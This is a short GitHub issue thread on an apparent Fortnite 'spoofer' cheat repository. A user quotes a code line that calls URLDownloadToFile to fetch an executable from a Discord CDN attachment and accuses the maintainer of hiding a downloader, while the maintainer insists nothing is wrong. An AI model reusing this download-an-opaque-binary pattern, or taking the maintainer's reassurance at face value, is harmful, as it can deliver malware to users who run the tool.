### ISSUE TITLE
Explain.

### ISSUE THREAD

**Issue by berkantdu123** [LKServicess/Fortnite-Spoofer#2]
URLDownloadToFile(NULL, _T("https://cdn.discordapp.com/attachments/813779903208095784/904085162621538304/spoofer.exe

**Comment by LKServicess** [comment]
thats the spoofer...

**Comment by berkantdu123** [comment]
> thats the spoofer...

Yes an script that downloads a weirdly native file, just admit it.

**Comment by LKServicess** [comment]
theres nothing wrong with that
